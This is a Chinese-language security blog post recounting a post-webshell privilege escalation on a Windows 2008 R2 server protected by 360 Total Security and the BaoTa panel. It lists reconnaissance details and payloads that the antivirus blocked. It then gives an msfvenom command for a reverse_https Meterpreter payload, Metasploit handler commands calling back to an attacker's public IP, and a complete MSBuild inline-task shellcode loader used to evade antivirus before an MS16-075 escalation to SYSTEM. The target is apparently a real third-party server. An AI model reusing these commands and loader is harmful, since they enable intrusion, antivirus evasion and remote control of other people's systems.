绕过360安全卫士提权实战案例

admin

102803
文章

87
评论

2020年10月25日16:00:50评论1,057 views字数 3461阅读11分32秒阅读模式

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

所有话题标签：

#Web安全 #漏洞复现 #工具使用 #权限提升

#权限维持 #防护绕过 #内网安全 #实战案例

#其他笔记 #资源分享 #MSF

0x01 前言

这个案例也是帮一个朋友看的，拿到Webshell权限后先对目标机器进行了简单的信息搜集，通过以下信息基本能确定目标机器上安装的有360安全卫士和宝塔Windows服务器运维管理面板，其中包括有宝塔安装的MySQL数据库和FileZilla Server软件等。

0x02 信息搜集

目标机器基本信息：

支持脚本：ASP、PHP（不能执行命令）目标系统：Windows 2008 R2（IIS7.5）当前权限：iis apppool**********.com开放端口：21、80、135、888、3306、6088、8888、12828（TermService）进程名称：360tray.exe、ZhuDongFangYu.exe、FileZilla_Server.exe、mysqld.exe、runserver.exe（btPanel）、task.exe（btTask）、python.exe、KuaiYun.exe（景安云自带插件）

注：这里因为宝塔安装目录权限和随机密码安全机制的问题，D:BtSoft目录没有读取和写入权限，所以我们没办法直接利用目标机器上的MySQL、FileZilla Server来进行权限提升。

0x03 实战提权过程

(1) 笔者根据个人经验感觉可以利用MS16-075来进行权限提升，但是由于目标机器存在360安全卫士，在提权过程中遇到了不少问题，比如我们上传的Windows Payload、大部分提权EXP以及其它恶意程序在执行过程中都会被360安全卫士查杀，首次执行无回显，二次执行已被查杀。

(2) web_delivery、hta_server模块生成的Payload也会被目标机器上的360安全卫士的Powershell进程防护拦截，mshta.exe可以被正常执行，但执行底层powershell.exe会被拦截。

绕过360安全卫士提权实战案例

(3) 因为目标机器用的宝塔Windows服务器运维管理面板，默认安装的有Python环境，利用Python Payload可以成功得到会话，但是无法使用incognito扩展和MS16-075模块。

(4) 使用php/meterpreter/reverse_tcp得到的会话功能有限，很多命令执行不了，同样无法使用incognito扩展和MS16-075模块。

(5) 笔者最终是通过MSBuild.exe白名单成功得到目标机器Meterpreter会话，这里需要将x86会话进程注入到x64进程中去，然后再利用ms16_075_reflection_juicy本地权限提升模块成功拿到目标SYSTEM权限，其它白名单也就没有再去测试了。（留了个坑，自己去踩）0.0 !

root@kali:~# msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_https LHOST=公网IP地址 LPORT=5555 -f csharp
msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_httpsmsf5 exploit(multi/handler) > set lhost 公网IP地址msf5 exploit(multi/handler) > set lport 5555msf5 exploit(multi/handler) > exploit

0x04 MSBuild白名单

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">         <!-- This inline task executes shellcode. -->         <!-- C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe SimpleTasks.csproj -->         <!-- Save This File And Execute The Above Command -->         <!-- Author: Casey Smith, Twitter: @subTee -->         <!-- License: BSD 3-Clause -->    <Target Name="Hello">      <ClassExample />    </Target>    <UsingTask      TaskName="ClassExample"      TaskFactory="CodeTaskFactory"      AssemblyFile="C:WindowsMicrosoft.NetFrameworkv4.0.30319Microsoft.Build.Tasks.v4.0.dll" >      <Task>
        <Code Type="Class" Language="cs">        <![CDATA[    using System;    using System.Runtime.InteropServices;    using Microsoft.Build.Framework;    using Microsoft.Build.Utilities;    public class ClassExample :  Task, ITask    {               private static UInt32 MEM_COMMIT = 0x1000;                private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;                [DllImport("kernel32")]        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);                [DllImport("kernel32")]        private static extern IntPtr CreateThread(                    UInt32 lpThreadAttributes,        UInt32 dwStackSize,        UInt32 lpStartAddress,        IntPtr param,        UInt32 dwCreationFlags,        ref UInt32 lpThreadId                   );      [DllImport("kernel32")]        private static extern UInt32 WaitForSingleObject(                   IntPtr hHandle,        UInt32 dwMilliseconds        );                public override bool Execute()      {        byte[] shellcode = new byte[] { Insert Shellcode Here };
          UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,      MEM_COMMIT, PAGE_EXECUTE_READWRITE);          Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);          IntPtr hThread = IntPtr.Zero;          UInt32 threadId = 0;          IntPtr pinfo = IntPtr.Zero;          hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);          WaitForSingleObject(hThread, 0xFFFFFFFF);          return true;      }     }             ]]>        </Code>      </Task>    </UsingTask>  </Project>